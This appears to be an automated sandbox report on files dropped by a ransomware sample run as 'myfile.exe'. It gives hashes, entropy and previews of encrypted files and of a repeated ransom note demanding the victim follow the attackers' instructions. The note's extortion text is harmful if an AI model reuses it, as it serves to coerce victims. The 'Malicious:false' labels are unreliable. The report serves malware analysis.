                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):65764
                                                              Entropy (8bit):7.997647740796352
                                                              Encrypted:true
                                                              SSDEEP:1536:ppbZfWCh8Qe0IcTMQxOQlrZPWTFqZ4IJFueFDG:p3bhZekTMQxOQlVPAFq2EFuKDG
                                                              MD5:3DCF599C47583E824EE9CB101F296E89
                                                              SHA1:8F77925466F2222A7DFB2F51D806058F87E1407B
                                                              SHA-256:8700BDA60E10F03BD4D87C516C1958383E7E4ED73AD7010BDBEC1C9EF9DA2377
                                                              SHA-512:41F702C6145A21AAF7BAB5C79421FA52150A9EB5B0DB771CFEAF71E7E0E1418C1DC2942C0BF3BC33BFF2F777419AABA90C4C85D5362D521B89DEA01B5CEA49C7
                                                              Malicious:false
                                                              Preview:.g..."...I...=...!=Z.'..l.......f...~........[...%.I.....:.9.= ;...R...I..Z.x..;!"..0..ee.u...n.E..BRd/.<s.G`.lZ..B.......8..X:L....#.j.P.;!./y......._........!Nk:t.vK..:....B.y..2.g..."....8p.8.....3..[.Q_vX._...X.....,[.uh..i.z...X.s..vA...".Y....Y..h...4..K.X1.y...".m.".N.P.T.......r........,..&r.>.u'.?.P2..?...1\.K.7.N......v.c..ifkd..w...*......^...:.B#Om.i..(.D"M...(.t...I..~..i....K..^up...S.X.]....Bf.$.@.e....?c...h0iI.T;...Y....$Hi..gpE0|...h.....o..5..P..3{.\_....S.;."L......l.B.=.;.;].O.....Kr..kv(1.o.U..:.e.j...X.E...fj~.,...O.U..N.?..8s....>....X.[..jn]... .J#`Vk70........x.N.d{.u...gI.e...].f.(...)b.|S0.v....J4r...D..b...}G.O..._5.Z...&..q....v.KFQ.CN9.ncj.....W..l..y..r.....lm....G..{..[%g..c..O.b|......m...."....zL[.N...."...,l6.eG.H4Mr....u%........|.E.l/...w..Nf..[H.7.v..<&...j..k..l.u.n..P.0.W....\.5..I...{G....I..C....O.RD.O:T..'........#C..z....5U.lDX.uvB.UI...@...p`....%...x.a.........D.c2....MW.k.9...A
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):20708
                                                              Entropy (8bit):7.991077676716266
                                                              Encrypted:true
                                                              SSDEEP:384:r2juwp/onl103G3RWFB0xgFT8F6Kg7yPcs8ZoeRd/6Q:r2jYIG3RxgFT8F6js4oedyQ
                                                              MD5:EF363114A2DC9AFE272D13485F271AC1
                                                              SHA1:8E0790D762EB6E2D1D9ADCEB945B100221ADDCFD
                                                              SHA-256:363ABA9F2253A7160B1B274821C8BFDC066964E774ACD856A897BA96CDA401EC
                                                              SHA-512:B8DAC3FBDA36C400CCB8F37F1B3A6740B4472484BC8B6826DEDCD4F2B350264F0D035F415B0113131A0FB834EC044300A8E774E49C95F201EC32744EFEF7FE1E
                                                              Malicious:false
                                                              Preview:..d....*....W.....^.!tO$/....}.&y..U.........B...=yQ.(L....f.s]e...y..n.~...H..A.q..;dx.mU6......7.t.e....u...?).9..*'..Nc.........g...t.dS.M..........\.7.6...\...+..C"yr...kcm..V.im^(..k.{2V..;..Du4.......C.1..Gk7.T....t.L?D..'...G...-.........[......s.....s.\..x.NZ.1aWdF0F*...E...kiz..0..2.n.fr&H).!*{..qU..h..]7.)FN.<.2&d..:.A....(...=-eA:[..H.u..c..q......_....-..m'.G.'..k...Xf..;HL.$1{...v.X..2.........]k^2.....@l..C.7....k. ...T.I.&.C..u.>."..c.....4F.=.T......,._M..m......IS".I.....R....k./.........G...t].u.!.#..F..y.?...+.IQ..2g..at.;..B..sAS.XSK.'%...|a....&$S.....$...W..vl..g..........^g\9...T.D..fK'....V.0.D8B.qS.W...seW.S..}4I.@.....K5j[I.3:......lK.,..S.l3.%(.q.....rq.....~.........l..&.Ml/.`4.(<P.|..E1.r....*^.}..V.EC..........L.*..a.n.j.Rp"..,..\..B...1b.}.S..H!..Ff...yM....n....V...Xt.;>..n.R\F.x..X.U..z.e.....F......Cr.>e@F.a..B}%.9....b..pN..X..%17D.L......B7(...Zz.~g..wu..X....nW...}...7.....u..._.R..^..h...T.$V
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):65764
                                                              Entropy (8bit):7.997071838072276
                                                              Encrypted:true
                                                              SSDEEP:1536:8aSOYE6Zzmy/lBtrdPrZ8sAiVmtKzc9clT7LXKM0o5gd:EOYvZqQBtrdKsbxw9uT7LKxOgd
                                                              MD5:F1ECF7797230E59AC26B3F38C44A75EE
                                                              SHA1:7DC906DE9317A0F0387E3E545A2D6DB24596CFE4
                                                              SHA-256:E99AE019B5F9D13C4B2B992F84B184932D91F40A70EFB2D1DE8CF0597502662A
                                                              SHA-512:22D01DDEA719C2EB530FA554554DDDB859380BC0C687DEC3B2CB0DEA271DDBACD0422D897A2FBB8F864381A494A4E9296A14605A7A0188DA135446C1457EF018
                                                              Malicious:false
                                                              Preview:.|.U2.j"._i..6j.wY...:.5t-M_8lF.eO-......q.......x.(p.+#)1U.S.....*P.....h.\^E.q.I....'j...+.D.l%v.V...%@.Q..t.....G.9I."u..^vF.@...r..w..Y......9X....X...._.. N.!.cc5.G..Q.$,"Ly.....(.k+.T....Z.\.9...h..N...gD.0+O.H........,JVRBv...i..t..`..."~.P,....R..F.F.....Y.h....ik...$.{s.k..h>.\..sq.........a.^m1z..L'.W.T).d...-.........."....a.v..2lC.....:w.J..r$.*.$l^...|.....o.....b..JC.,Z.m...x..........rp6...+Y.DR..|....yy.@c(/...Zg0W..l.>./.g......AN3B..\.F.M..-...I._....(..4..}...Q.........O.............~....S?.W..U $`...l.]N.@.m.J..u..1<l........Z.E.D.&N#.ac.k..D..s{.9.q.....1.!.K..q.C>...i-.y.g..x...edR.;...&...HM..Tt..t[.$h.....AM..S.s>%|.%7.....Kg.f....ntL.L....#0..X}.....=..2...eo..R......\.......t....I.X..F.Wa*..z...ZD)#...&.; ..;.dm.^*...T..}...cR..~.q..y.....d.}....KF.M^Q.zC...7....hLP..V...0<.m..|...P.D....ee...c.'.0....hp.OA..Y..A....xe*5...A.|+R...x..Pa.......k"6..........&w...q.R.x./.l!...q._...o.|.G.n...../.l.13rba1...Xz.M.B.....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):524516
                                                              Entropy (8bit):7.999698450015166
                                                              Encrypted:true
                                                              SSDEEP:12288:CgahDdGIWz9N0vMU9w1a+jUdoxqAyQfDQd3T96r4:CNJspTUSM+wdondLq30k
                                                              MD5:44E85B660B63C608E6D03A7009D0F374
                                                              SHA1:DB7E826DEEDBBC16AC51741CEC1DF9558F30B3B0
                                                              SHA-256:2BC4BD786468AD9D8B07EFF7B8312255A1B1DFE0766F8C882F9BBDBB017FDCCA
                                                              SHA-512:95B32B8721A8C6B5675A09527497A96DD5C317820FD6F4AC22B525EBFB05D883F31C718F2D7FD86812D5952A292AB9AE1FAF659DDB7EBBA6AF687FC2D3A7AC3A
                                                              Malicious:false
                                                              Preview:.B..%.8.ca.wU.!.F......e.V.k..H.y.{d#.4f....p,........x|....f........N.....oi....b~^...i...t....3O.;.#.c.v...[!.t...&.2.yY.M...v..C,Y.......K..w...Ez.#w..F.....fW.%..4.6...=.Z.f.X....{Zt.kg.r.......e....<..xI...}.b+My.*......w.H...1|N/X........QM6.6.j.,.....G...q.M. .9........]{j..I.e.................!.D......:.....q.......[.....<....,...0..g).J1.:....Du3...k...FrIi...r.q....j:.v...GP\..lJ.......P..8......n.=..%...3X.AK......yo0..M.....p5'..N..}.2.HB.#..*.......D.H....d[.hj.$1.p....,.t..8...`...*Pr0q'...q..".YD/..d..">..7{8S|...!.....4..hz..zd..N_..Zg6..q.....IL......-.@=D.y._2@.W...b5....1.En.y.|.'..dXlM..0"Z..c..7\1/..N...6!.lCmo~...=!a=>..5....aR.,g..^...,.g.....o.F..!.c...Q9@...5....).G!H.7.Fy....|.Kw..'........b..m)...i8...<.vdv``..Hy...0l..N...$$...AG...R.j....QQ....\j..2.k`. .4..%.[.+4]....[.l~v.jfo.. u.....R& ..{OTz.......G`...}5.. .....i4.b..d.Z.q.D....\O..mw.....M.....}..ly.X.&.R..a.....N..7m....P.....J.F8.o+._..t.:>..+ 8(
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):524516
                                                              Entropy (8bit):7.999631010343217
                                                              Encrypted:true
                                                              SSDEEP:12288:jkt9BRPoPDNRGiVfkjI/k5r+H4O1xHw8Ketia6ILQB:wtoDvl6+YexHtNiaVLe
                                                              MD5:91534450BDC01628547A707FA88A22B1
                                                              SHA1:F739CCEDD76ECA2260DEC6B661946CF1F84FAF3C
                                                              SHA-256:3DB9F11899D1A46565D1146D9F2F770430DC890DCF171753EF23788E62D102B9
                                                              SHA-512:4397315AAAA187C0FB680626C40B3F0E0A64B1CC2C3CF098FE83DC16640EA6B9A4F3044AF85A6A9143416D9CFD9602CE52F6D47FDDCA78D2E2CE4D2239B7A21B
                                                              Malicious:false
                                                              Preview:T.4...hM..?F...mxe..J.e^...!..A@8........X.$j.f.i..u..\+.....?....~w..W.....1...M.M|Uz...}..iX..7.1...o!..._ki..9.|.t/..&b...y.q.a..zV....(.*Oe..T........=>...Z,[<.....r}.....X.>.......Y.4((pZ7D.+......\AOp`.s./E.&..mB.9.d.5:@.!|....E...d......{..i(....7Xz@......X.jj.?...T......7...Y...&..p.pH.MbhK*.Q..."#E..s+...%&..l...2Me...c.#j.g.,I.z}#^...v=.F.D.h..%...c....Nt..xh..r......=.....F.tA.:...@...u.V..q.zT.2.t.............lu.b8m*.(..8n.....3;...;.Dp+I8...6oi...C.}l`....U....#.d\.FvFh...@.>0|.a/....8.[.*....-.|.N."..V.&-...Nb.3......9P /|..........d....Yq....`..[.'.....De[.}\6.....5a.R.......a...vb5..f.:..6.....9u.j...*..A...<Y.._..`._.g'iY..v..Hm..?....T.l\JRYW.........4!.c...#.R.......a...O]J.6...._n.R .E)^;...5..a:....5q.....2..w.0..J&.I..M.....K.S'...68Vq..L{.c....^&........-.aA.^...w..._.%..G.f.....2.\B...v....!....#.D._F"B.S.V...k.HQ...sL..X...L.|hr....![Cd $.M.v.....I......g\..D...\..~.....m.=v.......Y..5.D...*_..7f....^a.K.;..3<.>.-w...r._).u
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
